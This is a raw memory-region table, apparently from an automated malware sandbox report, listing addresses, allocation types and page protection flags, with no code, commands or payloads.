direct allocation
page read and write
2130000
heap
page read and write
24BA0000
trusted library allocation
page read and write
408000
unkown
page readonly
8880000
trusted library allocation
page read and write
23FBE000
stack
page read and write
24520000
trusted library allocation
page read and write
74F000
heap
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
21E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
9830000
direct allocation
page execute and read and write
2E70000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
772000
heap
page read and write
2E10000
trusted library allocation
page read and write
7819000
heap
page read and write
24520000
trusted library allocation
page read and write
21D67000
trusted library allocation
page read and write
24AF0000
trusted library allocation
page read and write
217CC000
stack
page read and write
24B00000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
585000
heap
page read and write
23DF0000
trusted library allocation
page read and write
31D0000
trusted library allocation
page read and write
62D8000
heap
page read and write
24520000
trusted library allocation
page read and write
7AB0000
trusted library allocation
page read and write
7450000
heap
page read and write
62D3000
heap
page read and write
24520000
trusted library allocation
page read and write
78C0000
heap
page read and write
24500000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
31C0000
trusted library section
page read and write
2E70000
trusted library allocation
page read and write
27C0000
heap
page read and write
24B80000
trusted library allocation
page read and write
625A000
trusted library allocation
page read and write
8B10000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
24B00000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
23E40000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
37D0000
heap
page read and write
24520000
trusted library allocation
page read and write
389C000
stack
page read and write
21C90000
trusted library allocation
page read and write
21FF2000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
62D8000
heap
page read and write
24000000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
6380000
trusted library allocation
page read and write
720000
heap
page read and write
24B80000
trusted library allocation
page read and write
88EC000
heap
page read and write
44C000
unkown
page read and write
8A6B000
heap
page read and write
24C00000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
24AE0000
trusted library allocation
page execute and read and write
24BD0000
trusted library allocation
page read and write
21A3E000
stack
page read and write
24B00000
trusted library allocation
page execute and read and write
23EBF000
heap
page read and write
2E70000
trusted library allocation
page read and write
21FC1000
trusted library allocation
page read and write
8D70000
heap
page read and write
61E0000
direct allocation
page read and write
21FB8000
trusted library allocation
page read and write
24001000
trusted library allocation
page read and write
28C3000
heap
page read and write
2E70000
trusted library allocation
page read and write
21E72000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
40A000
unkown
page write copy
23DAB000
trusted library allocation
page read and write
9810000
trusted library allocation
page execute and read and write
2E70000
trusted library allocation
page read and write
23E66000
trusted library allocation
page read and write
3212000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
2447F000
stack
page read and write
21FBC000
trusted library allocation
page read and write
6210000
direct allocation
page read and write
23E64000
trusted library allocation
page read and write
8B14000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
3227000
heap
page read and write
24000000
trusted library allocation
page read and write
24001000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
4CA0000
heap
page read and write
2E70000
trusted library allocation
page read and write
24BE0000
trusted library allocation
page read and write
24B90000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
24BB0000
trusted library allocation
page read and write
6339000
heap
page read and write
24B00000
trusted library allocation
page read and write
7AE0000
trusted library allocation
page read and write
8570000
trusted library allocation
page execute and read and write
399C000
stack
page read and write
2E71000
trusted library allocation
page read and write
21DC5000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
6310000
heap
page read and write
21E7A000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
22FD6000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
243FF000
stack
page read and write
24B10000
trusted library allocation
page execute and read and write
60E7000
heap
page read and write
24000000
trusted library allocation
page read and write
40A000
unkown
page read and write
772000
heap
page read and write
24B80000
trusted library allocation
page read and write
8630000
heap
page read and write
2E70000
trusted library allocation
page read and write
21BEE000
stack
page read and write
2452F000
trusted library allocation
page read and write
7A4E000
stack
page read and write
21FCE000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
31CF000
stack
page read and write
24B00000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
3215000
trusted library allocation
page execute and read and write
762000
heap
page read and write
2E70000
trusted library allocation
page read and write
77B000
heap
page read and write
2E70000
trusted library allocation
page read and write
21AA0000
direct allocation
page read and write
24001000
trusted library allocation
page read and write
21D23000
trusted library allocation
page read and write
24BD0000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
9820000
trusted library allocation
page execute and read and write
24B90000
trusted library allocation
page read and write
22001000
trusted library allocation
page read and write
24B80000
trusted library allocation
page read and write
74F000
heap
page read and write
31B0000
trusted library section
page read and write
506D000
stack
page read and write
2E70000
trusted library allocation
page read and write
21C80000
trusted library allocation
page execute and read and write
30E0000
direct allocation
page read and write
42D000
unkown
page read and write
7B50000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
62C4000
heap
page read and write
24520000
trusted library allocation
page read and write
7B20000
trusted library allocation
page read and write
77B000
heap
page read and write
240C0000
heap
page read and write
8565000
stack
page read and write
E97000
stack
page read and write
21DA1000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
21BAB000
trusted library allocation
page execute and read and write
2E70000
trusted library allocation
page read and write
61D0000
direct allocation
page read and write
2E70000
trusted library allocation
page read and write
7826000
heap
page read and write
2E70000
trusted library allocation
page read and write
3100000
direct allocation
page read and write
23E40000
trusted library allocation
page read and write
21D35000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
64E7000
heap
page read and write
24C10000
trusted library allocation
page read and write
21B73000
trusted library allocation
page execute and read and write
244BE000
stack
page read and write
2E20000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
62D4000
heap
page read and write
24520000
trusted library allocation
page read and write
23EC6000
heap
page read and write
4BE3000
remote allocation
page execute and read and write
85ED000
stack
page read and write
24500000
trusted library allocation
page read and write
24000000
trusted library allocation
page read and write
88F4000
heap
page read and write
3090000
direct allocation
page read and write
4B6E000
stack
page read and write
7893000
heap
page read and write
23E40000
trusted library allocation
page read and write
31F9000
trusted library allocation
page read and write
6200000
direct allocation
page read and write
639E000
trusted library allocation
page read and write
24B10000
trusted library allocation
page read and write
22FC9000
trusted library allocation
page read and write
24AF0000
trusted library allocation
page read and write
28CB000
heap
page read and write
625A000
heap
page read and write
22F21000
trusted library allocation
page read and write
7B30000
direct allocation
page read and write
24000000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24001000
trusted library allocation
page read and write
21D31000
trusted library allocation
page read and write
2274000
heap
page read and write
7800000
heap
page read and write
24000000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
766000
heap
page read and write
23F14000
heap
page read and write
24500000
trusted library allocation
page read and write
24B00000
trusted library allocation
page read and write
24BA0000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
24520000
trusted library allocation
page read and write
4C0C000
stack
page read and write
2E70000
trusted library allocation
page read and write
23E60000
trusted library allocation
page read and write
21E74000
trusted library allocation
page read and write
230AD000
trusted library allocation
page read and write
8AF0000
trusted library allocation
page read and write
2180E000
stack
page read and write
28C7000
heap
page read and write
21B8D000
trusted library allocation
page execute and read and write
7687000
trusted library allocation
page read and write
21E49000
trusted library allocation
page read and write
22F82000
trusted library allocation
page read and write
44E000
unkown
page readonly
24520000
trusted library allocation
page read and write
230E8000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
There are 900 hidden memdumps, click here to show them.